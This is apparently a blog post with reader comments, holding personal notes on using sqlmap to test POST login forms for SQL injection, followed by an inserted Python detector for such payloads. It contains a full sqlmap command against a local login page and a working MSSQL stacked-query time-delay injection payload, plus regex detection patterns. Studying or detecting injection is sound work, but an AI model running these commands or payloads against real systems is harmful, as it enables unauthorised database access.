Notes for sqlmap and POST requests since every f**king tutorial only covers GETs
options you'll want to use
-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string
--postfix=POSTFIX <-- Injection payload postfix string
--dbms=DBMS <-- Force back-end DBMS to this value
*--dbms= if sqlmap is sucking
we'll assume we have a simple POST request
user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
--method to pass the POST option
--data to pass the parameters that are required for the POST
-p to pass the injectable field, so in this case the username field (usernameTxt)
--prefix to pass what needs to be sent before we can inject. here we had to issue a tick ( ' ) and a right parenthesis ( ) ) to close out the string literal and the enclosing parenthesis in the original query
--dbms to tell it the backend was mssql
this yields a sqlmap payload like so:
Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
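A defender-side check, added here as an example and not part of the original post or of sqlmap: given a POST body logged by a web server or WAF, split it on "&" only (not ";", so a stacked query stays inside one value), decode each value, and flag the structures visible in the payload above (the WAITFOR DELAY probe, the stacked ";", the "--" terminator, and the "')" breakout that the --prefix produced). SAMPLE_BODY is constructed from the page's own payload; the indicator names and the assumption that the body is logged unencoded are mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample input: the POST body sqlmap built for the login form on
# this page, as a web server or WAF would log it (assumption: logged as sent).
SAMPLE_BODY = (
    "usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo"
    "&passwordTxt=blah&submitBtn=Log+On"
)

# Indicator name -> regex, checked case-insensitively against each decoded value.
INDICATORS = {
    # MSSQL time-based probe, the one sqlmap used in the payload above
    "time_delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    # a second statement after ';' (stacked query)
    "stacked_query": re.compile(
        r";\s*(WAITFOR|SELECT|INSERT|UPDATE|DELETE|EXEC|DROP)\b", re.I
    ),
    # SQL comment used to discard the rest of the original query
    "comment_terminator": re.compile(r"--|/\*"),
    # quote followed by ')': closing an open string and parenthesis (--prefix="')")
    "quote_paren_breakout": re.compile(r"'\s*\)"),
}


def parse_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body into {name: decoded value}.

    Splits only on '&', so a ';' inside a value (stacked query) is preserved.
    """
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return params


def quotes_unbalanced(value: str) -> bool:
    """Naive 'broken string literal' heuristic: odd number of single quotes."""
    return value.count("'") % 2 == 1


def scan_post_body(body: str) -> dict:
    """Return {param: [indicator, ...]} for every parameter that trips a check."""
    findings = {}
    for name, value in parse_body(body).items():
        hits = [label for label, rx in INDICATORS.items() if rx.search(value)]
        if quotes_unbalanced(value):
            hits.append("unbalanced_quotes")
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    for param, hits in scan_post_body(SAMPLE_BODY).items():
        print(f"{param}: {', '.join(hits)}")
```

Note what does not fire: sqlmap closes the payload with AND ('yTwo'='yTwo, which re-balances both the quotes and the parenthesis it opened, so the odd-quote-count heuristic stays silent on usernameTxt. Detection has to look at the SQL structure inside the value, not just at quote parity. The comment_terminator check is deliberately loose and will also match a legitimate value containing "--"; treat these as triage signals, not verdicts.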
Some of these, such as "--method", are deprecated in the new version of sqlmap (out last week). See the new version 0.9 for details. You may want to check out the "--forms" flag as well as tons of other new ones.

I suggest starting with the ChangeLog and the new documentation.

well, ain't that a bitch... damn you active development process mucking with my shitty personal documentation!

thanks for the heads up on that dre
everybody should check out the latest revision from sqlmap's repository (svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev) because the project has evolved a lot in the past year

I have yet to have POST functionality work correctly with SQLMap. Generally when I find a POST request and verify it manually I hunt around for a GET request sqli if I am using sqlmap, just because it usually fails horribly with POSTs.

I will have to check out the svn repository and maybe they have fixed this issue as well.
UPDATES: http://hackertarget.com/sqlmap-post-request-injection/

Nice but not the perfect way. What if the headers contain POST data in JSON format and the website is using AJAX to communicate with the server? Obviously, the server responds with a 403 error.